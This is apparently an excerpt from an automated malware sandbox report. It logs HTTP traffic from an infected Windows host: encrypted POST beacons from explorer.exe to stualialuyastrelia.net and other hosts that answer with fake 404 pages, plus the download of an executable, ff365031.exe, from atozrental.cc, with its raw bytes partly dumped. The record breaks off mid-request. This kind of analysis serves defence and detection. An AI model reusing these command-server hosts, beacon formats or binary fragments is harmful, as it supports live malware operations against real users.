8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 77 da aa 1b 6f d3 cb 29 32 7e fa 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 4d 67 85 4d 5e ae 03 93 62 27 e4 a6 0d 0d 9f 10 a3 d9 b0 99 5d 84 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 fa b0 92 48 a9 b4 bb 89 d9 16 28 d2 ae 10 1f d0 05 ab 7a 8f 82 76 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a d6 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a7 90 4e b0 d4 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 1d bf 9d 69 13 23 92 37 88 32 78 7e 66 0b 1b b9 fb 35 51 ed 00 e4 26 0d 72 d7 a2 65 3f 3f 1c f9 e1 f7 66 08 60 f4 ce 89 ca 3b d4 85 08 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d 95 73 36 77 9b 98 1d 45 8b 22 39 0d dc b0 7a f9 a9 83 f2 fe 27 ab b5 01 3b 7a 45 c5 1d 43 b0 d6 74 1f 61 20 09 ee d2 dd f3 d0 34 02 53 d5 2c 99 21 4f 1c 6e 9d 72 0d 72 70 f1 e9 ae 2c 1b 34 fb 02 fb 3f 40 a8 9d 72 02 71 90 18 81 5f
                                                                                                                                                                                                                                                                                                                Data Ascii: 1f66`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*j*T05sq733hsE|WD<P5Q"f=(*jC\SMUdT[Up"XJ3Ob>!Z:V?#BSSQQ+l~ExU$$^R!a~#5~O4zN.%Qa?|(HkJd/MF$l#l)l~qhJiOyTLW;*r#u1yr+Lc1<'i3FHU=hI?U@Wd{9f(B@=fd0QpKk1*:TUwo)2~[P&}WL\hMgM^b']tyPmCbzH(zv7 R:M?~Mpvn%.5_)CCUb:@3%}/#wRLEsCRW!}B.'<BV`se%x`80_xm^22B9GQ =TZ\Z_i9*nX%Sr^3m~CvbE.`:2nJeig:X]y7gT$:jqw'eSUHc6Zkvbi2NN/KtO$tli#72x~f5Q&re??f`;Gd-0c=s6wE"9z';zECta 4S,!Onrrp,4?@rq_
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.596066952 CET335OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://gyqhdviuiysyix.org/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.839133978 CET653INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:06:47 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:47.876610041 CET336OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://qyxinpdaqiaahua.com/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 218
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:48.119385958 CET289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:06:47 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 32 66 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 1c 81 1e cb 46 d7 f8 14 a2 25 bf 29 46 16 36 e4 69 1e 2b 85 56 2d 0e 61 9f bd 8c ac 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 2fUys/~(`:F%)F6i+V-a0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.052066088 CET334OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://mptxglrfiyoip.com/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 342
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.294565916 CET653INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:06:54 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                5192.168.2.649723211.119.84.112804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.734914064 CET219OUTGET /atoz/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Host: atozrental.cc
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:51.580056906 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                Server: nginx/1.24.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:06:51 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                Content-Description: File Transfer
                                                                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename=ff365031.exe
                                                                                                                                                                                                                                                                                                                Content-Transfer-Encoding: binary
                                                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                                                Cache-Control: must-revalidate
                                                                                                                                                                                                                                                                                                                Pragma: public
                                                                                                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b3 54 55 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 20 03 00 00 3a 3a 00 00 00 00 00 f3 95 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 3d 00 00 04 00 00 a9 e3 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 24 03 00 3c 00 00 00 00 f0 3b 00 98 39 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 49 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 1f 03 00 00 10 00 00 00 20 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 cc ba 38 00 00 30 03 00 00 4e 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 98 39 01 00 00 f0 3b 00 00 3a 01 00 00 72 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELTUd ::0@0=P$<;9`I@.text `.data80N$@.rsrc9;:r@@
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:51.580080032 CET1340INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 26 03 00 88 26 03 00 96 26 03 00 a8 26 03 00 b4 26 03 00
                                                                                                                                                                                                                                                                                                                Data Ascii: t&&&&&&&&'$'<'R'f'|''''''''((6(F(`(|((((((() ).)J)^)n)))))))
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:51.873018980 CET1340INData Raw: 03 00 00 00 20 05 93 19 00 00 00 00 00 00 00 00 56 69 73 75 61 6c 20 43 2b 2b 20 43 52 54 3a 20 4e 6f 74 20 65 6e 6f 75 67 68 20 6d 65 6d 6f 72 79 20 74 6f 20 63 6f 6d 70 6c 65 74 65 20 63 61 6c 6c 20 74 6f 20 73 74 72 65 72 72 6f 72 2e 00 4c 43
                                                                                                                                                                                                                                                                                                                Data Ascii: Visual C++ CRT: Not enough memory to complete call to strerror.LC_TIMELC_NUMERICLC_MONETARYLC_CTYPELC_COLLATELC_ALLP@AD@8CA8@8C@,@8CA @8CA@8CA
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:51.873043060 CET1340INData Raw: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 10 00 10 00 10 00 10 00 10 00 10 00 82 01 82 01 82 01 82 01 82 01 82 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01
                                                                                                                                                                                                                                                                                                                Data Ascii: H
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:51.873055935 CET1340INData Raw: 72 00 00 00 53 00 65 00 70 00 74 00 65 00 6d 00 62 00 65 00 72 00 00 00 41 00 75 00 67 00 75 00 73 00 74 00 00 00 00 00 4a 00 75 00 6c 00 79 00 00 00 00 00 4a 00 75 00 6e 00 65 00 00 00 00 00 41 00 70 00 72 00 69 00 6c 00 00 00 4d 00 61 00 72 00
                                                                                                                                                                                                                                                                                                                Data Ascii: rSeptemberAugustJulyJuneAprilMarchFebruaryJanuaryDecNovOctSepAugJulJunMayAprMarFebJanSaturdayFr
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:51.873070955 CET1340INData Raw: 41 00 74 00 74 00 65 00 6d 00 70 00 74 00 20 00 74 00 6f 00 20 00 75 00 73 00 65 00 20 00 4d 00 53 00 49 00 4c 00 20 00 63 00 6f 00 64 00 65 00 20 00 66 00 72 00 6f 00 6d 00 20 00 74 00 68 00 69 00 73 00 20 00 61 00 73 00 73 00 65 00 6d 00 62 00
                                                                                                                                                                                                                                                                                                                Data Ascii: Attempt to use MSIL code from this assembly during native code initializationThis indicates a bug in your application. It
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.165841103 CET1340INData Raw: 72 00 20 00 5f 00 6f 00 6e 00 65 00 78 00 69 00 74 00 2f 00 61 00 74 00 65 00 78 00 69 00 74 00 20 00 74 00 61 00 62 00 6c 00 65 00 0d 00 0a 00 00 00 00 00 00 00 00 00 52 00 36 00 30 00 31 00 39 00 0d 00 0a 00 2d 00 20 00 75 00 6e 00 61 00 62 00
                                                                                                                                                                                                                                                                                                                Data Ascii: r _onexit/atexit tableR6019- unable to open console deviceR6018- unexpected heap errorR6017- unexp
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.165862083 CET1340INData Raw: 00 00 90 00 00 c0 08 00 00 00 00 00 00 00 91 00 00 c0 08 00 00 00 00 00 00 00 92 00 00 c0 08 00 00 00 00 00 00 00 93 00 00 c0 08 00 00 00 00 00 00 00 b4 02 00 c0 08 00 00 00 00 00 00 00 b5 02 00 c0 08 00 00 00 00 00 00 00 03 00 00 00 09 00 00 00
                                                                                                                                                                                                                                                                                                                Data Ascii: @0M@@+@bad exception(CCIllegal byte sequenceDirectory not emptyFunction not implementedNo locks availableFilename too long
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.165874958 CET1340INData Raw: 74 6f 20 72 69 63 6f 00 73 70 61 6e 69 73 68 2d 70 65 72 75 00 00 00 00 73 70 61 6e 69 73 68 2d 70 61 72 61 67 75 61 79 00 00 00 00 73 70 61 6e 69 73 68 2d 70 61 6e 61 6d 61 00 00 73 70 61 6e 69 73 68 2d 6e 69 63 61 72 61 67 75 61 00 00 00 73 70
                                                                                                                                                                                                                                                                                                                Data Ascii: to ricospanish-peruspanish-paraguayspanish-panamaspanish-nicaraguaspanish-modernspanish-mexicanspanish-hondurasspanish-guatemalaspanish-el salvadorspanish-ecuadorspanish-dominican republicspanish-costa ricaspanish
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.165884972 CET1340INData Raw: 40 00 50 54 42 00 0c 34 40 00 45 53 53 00 fc 33 40 00 45 53 42 00 ec 33 40 00 45 53 4c 00 d8 33 40 00 45 53 4f 00 c4 33 40 00 45 53 43 00 a8 33 40 00 45 53 44 00 98 33 40 00 45 53 46 00 84 33 40 00 45 53 45 00 70 33 40 00 45 53 47 00 5c 33 40 00
                                                                                                                                                                                                                                                                                                                Data Ascii: @PTB4@ESS3@ESB3@ESL3@ESO3@ESC3@ESD3@ESF3@ESEp3@ESG\3@ESHL3@ESM<3@ESN(3@ESI3@ESA3@ESZ2@ESR2@ESU2@ESY2@ESV2@SVF2@DES2@ENG2@ENU2@ENU2@USA2@GBR2@CHNx2@CZEp2@GBR`2@G
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:52.165895939 CET1340INData Raw: 6e 74 20 64 65 6c 65 74 65 5b 5d 20 63 6c 6f 73 75 72 65 27 00 00 00 00 60 70 6c 61 63 65 6d 65 6e 74 20 64 65 6c 65 74 65 20 63 6c 6f 73 75 72 65 27 00 00 60 6f 6d 6e 69 20 63 61 6c 6c 73 69 67 27 00 00 20 64 65 6c 65 74 65 5b 5d 00 00 00 20 6e
                                                                                                                                                                                                                                                                                                                Data Ascii: nt delete[] closure'`placement delete closure'`omni callsig' delete[] new[]`local vftable constructor closure'`local vftable'`RTTI`EH`udt returning'`copy constructor closure'`eh vector vbase constructor iterator'`eh vec


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                6192.168.2.64973091.215.85.17805996C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:00.996897936 CET339OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://stualialuyastrelia.net/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 501
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:00.996946096 CET555OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 34 cc c4 b9 41 dd 0f 7e 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 81 9a c6 a4 19 ba 8a 14 62 cd d6 4f 96 86 c1 38 d9
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYj4A~;}f=BbO8p&QD{jB+"m]bF4JEBP5XO2_4,Dj{;j9k+0p.;B@sa3_qr1F7k~N
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:01.246674061 CET653INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:07:01 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                7192.168.2.649741186.182.55.44804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.384588957 CET336OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://ffjptnnneye.org/
